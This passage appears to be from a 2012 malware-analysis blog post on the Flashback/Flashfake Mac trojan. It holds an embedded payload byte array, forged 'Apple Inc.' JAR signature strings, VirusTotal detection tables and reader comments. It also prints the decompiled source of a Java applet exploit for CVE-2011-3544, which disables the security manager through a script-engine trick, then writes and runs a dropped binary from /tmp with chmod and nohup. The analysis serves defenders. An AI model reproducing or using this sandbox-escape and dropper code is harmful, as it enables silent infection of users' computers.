-47, 109, 35, -103, -3, 35, -67, 113,
-16, 29,
35, -75, 85, -92, -10, -120, -47, 31,
64, -34,
14, 101, -95, -61, 49, 127, 65, -51,
-68, -7,
-13, -26, -104, 31, -101, 38, -103,
100, -110, 73,
38, 125, 105, -24, 48, -113, -1, -89,
-17, -82,
84, -4, 127, -72, -124, -57, -1, -89,
-30, 123,
115, -58, -2, -37, -14, -21, 36, 127,
0, 41,
71, -84, -65, 77, -41, -50, -106, -119,
-19, 47,
78, 127, -121, 21, -114, -19, 63, 14,
31, 117,
17, -8, 56, 68, -33, -75, 124, 49, -3,
89,
-15, -4, 57, 116, 52, 79, -27, -79, -4,
-51,
-27, -7, -29, -8, -57, -118, -31, 63,
11, 58,
78, 67, -29, -77, -58, -1, -122, -104,
53, -114,
-62, 113, -5, -89, -89, -13, -104, -3,
-45, 23,
100, -49, 69, 127, 61, 86, -84, 62, -6,
82,
98, 12, -12, -32, -124, -4, 49, -6,
-28, 11,
33, -27, -114, -89, 79, -33, 15, 91,
-82, -8,
-7, -62, -15, -23, -40, 126, -86, -72,
-113, -7,
-2, -8, 29, 43, 102, 126, 42, -24, -64,
-37,
61, -43, 54, 58, 86, 126, 90, 90, 71,
-31,
56, -2, -127, 10, -2, -73, -61, -128,
109, 116,
-4, -2, -62, -52, -67, 40, 24, 27, -65,
-69,
-126, -57, -128, -17, 46, 56, -105,
-62, -15, -16,
-81, -127, -114, 107, 48, 47, -88, -93,
112, 12,
124, -59, 21, 44, 29, -1, -98, 47, -10,
61,
-13, 76, -114, -114, 123, 63, 83, -58,
-17, 11,
-26, 99, -58, -71, 87, 24, -30, -36,
65, 30,
-128, -127, -41, -50, -54, -114, 115,
-33, 53, -117,
-57, -71, -85, 87, -14, 56, -8, -1,
105, -100,
-69, 90, -55, -1, -24, 91, 91, 57, 58,
-50,
125, 42, -53, 29, -25, -98, -114, 113,
-65, -14,
-18, -32, -93, 47, -65, 49, -21, -115,
123, -118,
59, -105, 61, -43, 122, 71, -79, 24,
-125, 84,
-8, 53, 52, -118, -16, -3, -111, -117,
-80, -17,
14, -10, -89, -115, 61, -57, 62, 90,
-39, 31,
55, -18, -68, 92, -100, -5, -4, 33, 49,
-25,
-58, 54, -25, 18, 111, 110, -58, -102,
127, 53,
105, 35, -45, -34, -18, 27, 57, -43, 119,
-46,
22, -67, -55, -86, -83, -75, -77, 88,
83, -103,
-26, -74, 91, -5, 14, 72, -49, -3, -42,
34,
-3, 10, -96, -78, 104, 81, -33, 1, 107,
-1,
80, -9, 71, 32, -108, -57, 43, 49,
-118, -96,
-34, -50, -30, -9, 97, 28, 1, -7, 30,
-82,
73, 14, 30, -126, -9, 73, -76, -9, 13,
120,
-91, 36, -33, -28, 88, -76, -9, -41,
36, -75,
105, 111, -81, 94, -43, -46, 119, 114,
-111, -10,
-86, -42, 52, 28, -99, -116, 111, -29,
-24, 56,
-83, 105, -92, -26, 5, 77, 126, -23,
80, -67,
-99, -34, 102, -96, -47, 122, -56, 106,
-57, -53,
120, 57, 40, -114, 78, -34, -127, -11,
38, 105,
-83, -10, 114, 40, 43, -125, 122, 86,
124, -1,
-92, -22, -20, -127, 23, -124, 118,
-96, -1, 67,
-11, 34, 77, -27, -91, 123, -96, 84,
-77, -38,
-29, -113, 96, -55, -38, -116, -74, 31,
-94, -36,
112, 4, -117, -18, -125, 75, 30, 94,
16, -37,
98, -73, 69, 27, -122, -93, -43, -121,
26, -48,
17, -104, -67, 59, 25, 39, -86, 109,
-79, 91,
-75, 121, -10, -8, 111, -96, -98, 116,
66, -70,
-23, 24, -114, 14, 35, 13, -80, 32,
-38, 118,
68, -69, -56, 30, 95, -51, 59, 30, -70,
-29,
112, 84, 126, 41, -38, 112, 44, 58,
-98, 38,
-44, 54, 66, 113, 6, -35, 80, 26, -109,
79,
-33, -8, 109, 12, 48, -96, -119, -33,
121, 114,
7, 76, -16, 33, -86, 100, -45, -38, 70,
106,
-114, -126, -46, 114, 124, 8, 81, 57,
-122, 22,
-32, -32, -15, -36, 10, 6, 92, 4, 125,
-59,
59, -79, -121, 126, -11, -93, 100, -78,
-82, -5,
-30, -8, -76, 34, 30, 93, 80, -98,
-102, -49,
-12, 34, -34, 20, -73, 115, 106, -118,
39, -99,
-29, -49, -32, -20, -53, -19, 113, 123,
-114, -46,
-121, -16, 52, 11, -25, 95, -118, -123,
-3, 111,
-118, -72, -125, 24, 93, -95, -31, -93,
-109, -87,
57, -52, -18, -89, 22, -34, 108, 28,
12, -28,
-95, 31, -32, -104, -87, -31, 118,
-128, -75, -25,
31, 122, 0, -127, 90, 28, 63, -35, -78,
45,
-36, -16, -61, -40, 22, -84, -26, -75,
112, -53,
-88, 115, 80, 106, -30, -102, -88, 102,
106, 64,
-47, -15, 52, 18, 88, 94, -38, 84, 123,
124,
6, -42, -121, -4, 124, -56, 99, 59,
-73, -32,
88, -8, 109, -85, 68, 43, 68, 44, -36,
-15,
-2, 46, 104, -97, -72, 86, -104, 105,
17, 14,
-21, -108, -72, -47, 87, -92, -6, 107,
-121, 57,
-108, 99, 31, 104, 85, 88, 14, -42,
104, -1,
113, -44, 6, 117, -118, 68, 31, -65,
23, 10,
48, 38, 33, -83, -32, 112, 90, 16, 11,
-20,
27, -72, 50, 118, -114, 124, 6, 109,
-95, -51,
-69, 82, 118, 91, -22, -4, 76, 106, -107,
97,
-31, -13, -48, 121, 32, -10, -20, 8,
116, 102,
-76, -71, -74, -56, 30, 127, 64, -94,
-31, -92,
-121, 70, 101, 86, 94, -74, 49, 21,
-86, -112,
-81, 66, 35, 0, 75, 49, 96, -31, 4, 90,
-45, 33, -31, 35, -111, -70, 75, 62,
-108, 104,
-123, -96, -123, 98, -72, 0, 98, 40,
-31, 2,
-72, 10, 35, 24, 110, 19, -106, 116,
-93, 37,
-81, 18, 33, 12, -75, 73, 24, -90, -43,
78,
65, 12, -1, -119, 61, -109, -107, 82,
15, 32,
95, 36, 48, 0, -20, -4, 118, 44, 62,
-112,
46, 58, 89, -111, 41, -14, 1, 16, -117,
-111,
125, 95, -113, 87, -100, -127, -20,
121, 17, -52,
-16, -38, -39, 100, 50, -79, -118,
-126, 25, -60,
83, -34, 52, 50, 119, 28, 60, 20, -21,
-96,
-55, -99, 7, -15, 49, -96, -25, -126,
37, 43,
-15, -85, 46, 89, 89, 65, -36, 78, 124,
54,
-15, 107, -120, 87, 19, -97, 71, -68,
-106, -8,
34, -30, 117, -60, -21, -119, -69,
-120, -69, -119,
55, 19, 111, 37, -66, -122, -8, 90,
-30, -21,
-120, 119, 16, -9, 19, 15, 18, 15, 19,
87,
-119, -9, 16, -33, 66, -68, -105, -8,
86, -30,
-37, -120, 111, 7, -34, -73, 120, 23,
110, -11,
-35, -29, -47, 2, 107, -66, 107, -75,
39, -54,
96, -127, -12, 29, -76, -6, 31, -95,
58, 88,
74, -79, 12, 126, -100, -107, 46, -110,
-63, -113,
-13, 75, 60, -101, -114, 99, -16, -29,
76, 19,
-113, -91, -93, 24, -4, 56, -25, -60,
-50, 116,
12, -125, 31, 103, -97, -120, -91, 35,
24, -4,
104, -121, -60, 109, -23, -8, 5, 63,
90, 36,
-47, -103, -114, 94, -16, -93, 109, 18,
55, -91,
99, 23, -4, 104, -91, 68, 83, 58, 114,
-63,
-113, -10, 18, -111, 12, 24, -73, -32,
71, -53,
37, -82, 37, 25, 87, -105, 31, 109,
-104, -104,
70, -78, 31, 101, -76, 102, 98, 60,
-55, 91,
81, 70, -69, 38, 62, 39, -65, -2, 123,
81,
70, 11, 39, -34, 35, 25, 127, 42, -15,
-93,
-83, 19, -1, 70, 50, -58, -17, -8, -41,
-46,
-4, 73, 126, 25, -27, 117, 52, 127,
-110, -1,
21, -27, -114, -118, 116, 36, 3, 70,
41, -8,
-3, 52, 127, -110, -15, -71, -12, 7,
105, -2,
36, -113, -121, -25, -42, 31, -90, -7,
-109, 124,
57, -54, 42, -51, -97, -28, -85, 80,
-18, -95,
-7, -109, -68, 16, -27, 45, 52, 127,
-110, -65,
-119, 114, 47, -51, -97, -28, 111, -95,
-68, -107,
-26, 79, -14, 6, -108, -73, 85, -92,
35, 25,
-18, 64, 121, 59, -51, 31, 101, -58,
-66, -54,
49, 9, -87, 120, 4, 102, -56, 45, -70,
-33,
1, 49, 125, 50, 33, 35, -13, 88, 4, 9,
-66, -107, 115, -4, 39, 38, -37, -101,
-33, 47,
-125, -124, 31, -46, 35, 96, -93, 55,
33, 29,
-81, -32, 127, -49, -52, -124, 63, -62,
-26, 64,
90, 50, -115, -5, -31, -73, 67, 82, 32,
-35,
5, -23, 30, 72, 15, 67, 122, 2, -46,
126,
72, 71, -89, 113, 95, -5, 15, 32, 89,
-32,
111, -37, 73, -112, 102, 66, -102, 3,
105, 9,
-92, -107, -112, -38, 33, 41, -45, -71,
79, -5,
61, -112, 30, -122, -12, 4, -92, -3,
-112, -114,
66, 122, 107, 122, -31, -17, 25, -12,
-119, 63,
-83, -5, -1, 118, 40, 127, 60, 61, -29,
59,
-113, -14, -59, 51, -14, -8, -54, -61,
-4, -74,
66, -39, -33, -52, -56, -8, -60, -29,
-33, 91,
21, -107, -26, 119, -94, 73, 38, -103,
100, -110,
73, 38, -103, 100, -110, 73, 38, -103,
100, -110,
73, -1, -9, 41, -113, -1, -1, 14, 41,
111,
0, -128, -14, 3, 41, 79, 12, -64, -128,
-108,
35, 8, -96, -73, -4, -36, -126, 0, -84,
67,
-106, -14, 124, 49, 0, 15, 72, 3, -54,
-44,
49, -3, -1, 43, -50, -47, -1, -33, 126,
-114,
-2, -1, -77, -13, -8, -1, 95, -109,
-57, -1,
-65, -38, -24, -1, 63, 111, 44, -1, -1,
-38,
-68, -2, -1, -117, 10, -7, -1, -41,
-27, -10,
-1, -81, 63, 55, -9, 127, 87, 97, -17,
127,
119, 1, -25, -1, -26, 108, -33, -1,
-42, 60,
-82, -1, 107, 82, -98, -1, -10, -74,
-27, -115,
107, -26, 84, 87, -49, 69, 116, -83,
46, 2,
96, 93, 86, 0, 64, -121, -34, -1, -33,
-97,
118, -1, -49, 106, 29, -52, 10, 3, 8,
103,
69, 1, -88, 89, 65, 0, 61, -58, 24,
-128,
45, -122, 16, -128, 94, 67, 8, -64, 86,
73,
31, 2, 32, -91, 67, 0, -78, -6, -33,
46,
25, 98, 1, -2, -105, -30, 0, 122, 116,
113,
0, -23, 24, 0, 91, -74, -1, -65, -34,
-9,
95, -17, -9, -81, -9, -7, -41, -5, -5,
-21,
125, -3, -11, 126, -2, 122, 31, 127,
-67, 127,
-65, -34, -73, 95, -17, -41, -81, -9,
-23, -41,
-5, -13, -21, 125, -7, -11, 126, -4,
122, 31,
126, -67, -1, -66, -34, 119, -1, 113, -35,
-11,
-49, 117, -41, -49, -24, -82, 15, -24,
-82, -113,
-23, -6, 74, -24, 124, -12, -49, -24,
-4, -13,
39, -23, 124, -29, 47, -45, 93, -49,
-44, 93,
95, -83, -69, -98, -81, -69, -2, -122,
-18, -38,
-91, -69, 94, -82, -69, -10, -24, -82,
55, -24,
-4, -18, -15, 55, -51, 9, -116, -107,
-17, 17,
-7, -80, -56, -65, 8, 63, -9, 47, -94,
79,
-12, -17, 79, -7, -10, 95, -54, -105,
115, -99,
72, -90, -49, -3, -105, -36, -25, 62,
-13, -14,
43, -28, 124, -81, -85, -11, 69, 123,
-31, -21,
-122, 114, -82, -18, -8, -1, 13, -72,
48, -16,
12
];
private static String
dropFile = "/tmp/.sysenter";
]
JAR signature files carrying Apple information. DAS and SF files. I think it is something you can fake - "use the JAR Signing and Verification Tool to sign JAR files"
File: SUNMS.SF
Strings
Signature-Version: 1.0
SHA1-Digest-Manifest-Main-Attributes: fPlIJrwM0qYddN2iT3wv1BXlT9s=
Created-By: 1.6.0_17 (Apple Inc.)
SHA1-Digest-Manifest: h1REtbMLPS/h4zSUFRfF4WfRv7g=
Name: javaupdate/JavaUpdate.class
SHA1-Digest: f+I4wjROuXtwlvNBuO9QqMeJIqU=
Name: javaupdate/Payload.class
SHA1-Digest: asgEt/q0WVR8JnKO4gSmSgm+Tao=
File: SUNMS.DSA
Strings
-Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
120206180202Z
120506180202Z0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
Q&iE]@"Q
gQYW
{U%d
staQ_&
0u0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.
SAMPLE 3 Virustotal
JAVA 2011- 3544
MD5: B134EDEACD2660FA08F2F5A2EA916512
First seen by VirusTotal 2012-02-09 09:57:50 UTC ( 2 months, 1 week ago )
rhcls.java Virustotal {} are replaced by [] to prevent issues with blogger page saving posting and AV alerts
// Source
File Name: rhcls.java
import
java.applet.Applet;
import
java.io.*;
import
java.util.zip.DataFormatException;
import
java.util.zip.Inflater;
import
javax.script.*;
import
javax.swing.JList;
public
class rhcls extends Applet
[
public rhcls()
[
ldr_data = new byte[11803];
]
public void init0()
[
ldr_data[0] = 120;
ldr_data[1] = -38;
ldr_data[65] = 31;
ldr_data[66] = 109;
ldr_data[67] = -79;
-------------------------------------REDACTED
TO SHORTEN--------------------------
ldr_data[11801] = -122;
ldr_data[11802] = -89;
]
public void init()
[
try
[
ScriptEngine engine = (new
ScriptEngineManager()).getEngineByName("js");
Bindings b =
engine.createBindings();
b.put("applet", this);
Object proxy =
engine.eval("this.toString = function() [\tjava.lang.System.setSecurityManager(null);\tapplet.callBack();\treturn
String.fromCharCode(97 + Math.round(Math.random() * 25));];e = new
Error();e.message = this;e", b);
JList list = new JList(new Object[]
[
proxy
]);
add(list);
]
catch(ScriptException e)
[
e.printStackTrace();
]
]
public void callBack()
[
try
[
init0();
init1();
init2();
init3();
init4();
init5();
init6();
init7();
init8();
init9();
init10();
init11();
Inflater decompressor = new
Inflater();
decompressor.setInput(ldr_data);
ByteArrayOutputStream bos = new
ByteArrayOutputStream(ldr_data.length);
byte buf[] = new byte[1024];
while(!decompressor.finished())
try
[
int count =
decompressor.inflate(buf);
bos.write(buf, 0, count);
]
catch(DataFormatException e) [ ]
bos.close();
byte decompressedData[] =
bos.toByteArray();
saveFile(dropFile, decompressedData);
String params[] = [
"chmod",
"777", dropFile
];
Process p =
Runtime.getRuntime().exec(params);
int val = p.waitFor();
String paramstwo[] = [
"nohup", dropFile,
"&"
];
Process p2 =
Runtime.getRuntime().exec(paramstwo);
int valtwo = p2.waitFor();
]
catch(Exception ex)
[
ex.printStackTrace();
]
]
private void saveFile(String fileName, byte
content[])
throws IOException
[
OutputStream os = new
FileOutputStream(fileName);
os.write(content);
os.close();
]
private byte[] loadFileFromResources(String
fileName)
throws IOException
[
InputStream fin =
getClass().getResourceAsStream(fileName);
byte readBuf[] = new byte[0x4b000];
ByteArrayOutputStream bout = new
ByteArrayOutputStream();
for(int readCnt = fin.read(readBuf); 0
< readCnt; readCnt = fin.read(readBuf))
bout.write(readBuf, 0, readCnt);
fin.close();
return bout.toByteArray();
]
private static String dropFile =
"/tmp/.sysenterxx";
byte ldr_data[];
]
Automated scans
SHA256: e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241
SHA1: 42ef0a55690a8e12949e3c6055a322d7cfcb9cd0
MD5: 0bb60cde26e022b8044149f7da138c1f
File size: 25.3 KB ( 25891 bytes )
File name: e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241.jar
Detection ratio: 25 / 42
Analysis date: 2012-04-17 02:55:59 UTC ( 1 minute ago )
AntiVir EXP/2008-5353.AK.1 20120416
Antiy-AVL Trojan/Java.Flashfake 20120416
Avast Java:CVE-2012-0507-L [Expl] 20120417
BitDefender Exploit.Java.CVE-2012-0507.N 20120417
ClamAV Trojan.Flashfake-7 20120417
Comodo UnclassifiedMalware 20120417
DrWeb Exploit.CVE2012-0507.3 20120417
Emsisoft Trojan-Dropper.Java.Flashfake!IK 20120417
eSafe Win32.Trojan 20120415
eTrust-Vet Java/CVE-2012-0507!exploit 20120417
F-Secure Exploit.Java.CVE-2012-0507.N 20120417
Fortinet W32/OSX_Flashfake.V!tr.dldr 20120416
GData Exploit.Java.CVE-2012-0507.N 20120417
Ikarus Trojan-Dropper.Java.Flashfake 20120417
Jiangmin TrojanDropper.Java.k 20120416
Kaspersky Trojan-Dropper.Java.Flashfake.b 20120417
McAfee JV/Exploit-Blacole.e 20120416
McAfee-GW-Edition OSX/Flashfake.c 20120416
Microsoft Exploit:Java/CVE-2012-0507.D!ldr 20120416
NOD32 Java/Exploit.CVE-2008-5353.C 20120417
nProtect Exploit.Java.CVE-2012-0507.N 20120417
Sophos Troj/JavaDl-JI 20120417
SUPERAntiSpyware - 20120402
Symantec Trojan.Gen.2 20120417
TrendMicro OSX_FLASHBACK.EV 20120416
TrendMicro-HouseCall OSX_FLASHBACK.EV 20120416
Virustotal
SHA256: 1d24affa137a355a9963d1aba438b66753e62a00ce07d80626f399b600f1f00e
SHA1: 274a483583a965d7e3e3f518115684adf56c7e0a
MD5: ae7bbf2410b0efd0cbf1410ea41e07c6
File size: 55.8 KB ( 57188 bytes )
File name: xnm
File type: OSX binary
Detection ratio: 23 / 42
Analysis date: 2012-04-17 02:47:05 UTC ( 0 minutes ago )
Antiy-AVL Trojan/OSX.Flashfake 20120416
Avast MacOS:Flashback-L [Drp] 20120417
BitDefender MAC.OSX.Trojan.FlashBack.N 20120417
ClamAV OSX.Flashback-9 20120417
Comodo UnclassifiedMalware 20120417
DrWeb BackDoor.Flashback.35 20120417
Emsisoft Trojan-Downloader.OSX.Flashfake!IK 20120417
eSafe Win32.Trojan 20120415
F-Secure MAC.OSX.Trojan.FlashBack.N 20120417
Fortinet W32/OSX_Flashfake.V!tr.dldr 20120416
GData MAC.OSX.Trojan.FlashBack.N 20120417
Ikarus Trojan-Downloader.OSX.Flashfake 20120417
Jiangmin TrojanDownloader.OSX.p 20120416
Kaspersky Trojan-Downloader.OSX.Flashfake.v 20120417
McAfee OSX/Flashfake.c 20120416
McAfee-GW-Edition OSX/Flashfake.c 20120416
Microsoft Backdoor:MacOS_X/Flashback.F 20120416
NOD32 OSX/Flashback.J 20120417
nProtect MAC.OSX.Trojan.FlashBack.N 20120417
Sophos OSX/Flshplyr-B 20120417
Symantec OSX.Flashback.K 20120417
TrendMicro OSX_FLASHBACK.EV 20120416
TrendMicro-HouseCall OSX_FLASHBACK.EV 20120417
Virustotal
SHA256: 8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0
SHA1: ad716b284fef394bed3a99774bbf27c5da9e248c
MD5: d9d193658ea1555124854c3c827e4391
File size: 20.5 KB ( 20989 bytes )
File name: 8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0.jar
File type: JAR
Detection ratio: 21 / 42
Analysis date: 2012-04-16 22:54:38 UTC ( 3 hours, 56 minutes ago )
Antiy-AVL Trojan/win32.agent 20120416
Avast Java:Agent-ATC [Expl] 20120416
AVG Java/Exploit.APA 20120417
BitDefender Java.Trojan.Dropper.A 20120417
Comodo UnclassifiedMalware 20120416
DrWeb Java.Dropper.8 20120417
Emsisoft Java.Trojan-Dropper!IK 20120416
eTrust-Vet Java/Flashfake.A 20120416
F-Secure Java.Trojan.Dropper.A 20120417
Fortinet Java/Agent.EB 20120416
GData Java.Trojan.Dropper.A 20120417
Ikarus Java.Trojan-Dropper 20120416
Kaspersky Trojan-Dropper.Java.Flashfake.a 20120416
McAfee OSX/Flashfake 20120416
McAfee-GW-Edition OSX/Flashfake 20120416
NOD32 Java/Agent.EB 20120416
Norman - 20120416
nProtect Java.Trojan.Dropper.A 20120416
Sophos Mal/JavaKC-B 20120416
SUPERAntiSpyware - 20120402
Symantec OSX.Flashback 201204
TrendMicro JAVA_DROPPR.IC 20120416
TrendMicro-HouseCall JAVA_DROPPR.IC 20120416
Virustotal
SHA256: ab925167124a61228d6d8f4c9b04813f5382fc2c916e29ee9bef417c7d2054b5
SHA1: 8071e88e27d9655b8c4f7c30a3e18a0bec3200f1
MD5: b134edeacd2660fa08f2f5a2ea916512
File size: 44.7 KB ( 45797 bytes )
File name: B134EDEACD2660FA08F2F5A2EA916512
Detection ratio: 24 / 42
Analysis date: 2012-04-17 03:04:15 UTC ( 2 minutes ago )
AntiVir EXP/CVE-2011-3544.BC 20120416
Antiy-AVL Exploit/Java.CVE-2011-3544 20120416
Avast Java:CVE-2011-3544-G [Expl] 20120417
AVG Downloader.Generic_c.DCT 20120417
BitDefender Java.Exploit.CVE-2011-3544.A 20120417
ClamAV CVE-2011-3544.Java 20120417
DrWeb Exploit.CVE2011-3544.34 20120417
Emsisoft Exploit.Java.CVE!IK 20120417
eTrust-Vet Java/CVE-2011-3544!exploit 20120417
F-Secure Exploit:Java/Flashback.F 20120417
Fortinet Java/CVE_2011_3544.GX!exploit 20120416
GData Java.Exploit.CVE-2011-3544.A 20120417
Ikarus Exploit.Java.CVE 20120417
Kaspersky Exploit.Java.CVE-2011-3544.gx 20120417
Microsoft Exploit:Java/CVE-2011-3544.BY 20120416
NOD32 Java/Exploit.CVE-2011-3544.N 20120417
nProtect Java.Exploit.CVE-2011-3544.A 20120417
Sophos Mal/20113544-A 20120417
SUPERAntiSpyware - 20120402
Symantec OSX.Flashback 20120417
TrendMicro JAVA_DROPPR.IC 20120416
TrendMicro-HouseCall JAVA_DROPPR.IC 20120417
VBA32 Exploit.Java.CVE-2011-3544.gx 20120416
VIPRE Trojan.Java.Generic (v) 20120416
There were some news that kaspersky had some software that could fight this flashfake but simultaneously damages the system therefore they have not to distribute this tool. Java and Flash player are heaven for malware unfortunately
ReplyDeleteApple issued a fix/removal/patch a few days ago so just update your mac.
ReplyDeleteF-secure and dr.Web have tools too.
Number 2 is not any CVE, it is good old java_signed_applet social engineering exploit. Will show a scary message that you are executing code claiming from "Apple Inc." but whose identity cannot be identified, and hopes the user will click "Run" anyway. Will work on any Java version (starting from 1.2 or so), but requires user interaction.
ReplyDeleteThe other two CVE numbers look right. Thanks for showing the decompiled versions in your blog, saves some time!
C:\Temp>jarsigner -verbose -certs -verify D9D193658EA1555124854C3C827E4391
217 Mon Feb 06 12:02:02 CET 2012 META-INF/MANIFEST.MF
338 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.SF
1050 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.DSA
0 Mon Feb 06 12:01:50 CET 2012 META-INF/
sm 525 Mon Feb 06 12:01:50 CET 2012 javaupdate/JavaUpdate.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
[certificate will expire on 06.05.12 20:02]
sm 35864 Mon Feb 06 12:01:50 CET 2012 javaupdate/Payload.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
[certificate will expire on 06.05.12 20:02]
s = signature was verified
m = entry is listed in manifest
k = at least one certificate was found in keystore
i = at least one certificate was found in identity scope
jar verified.
Warning:
This jar contains entries whose signer certificate will expire within six months.
thank you, i will correct
Delete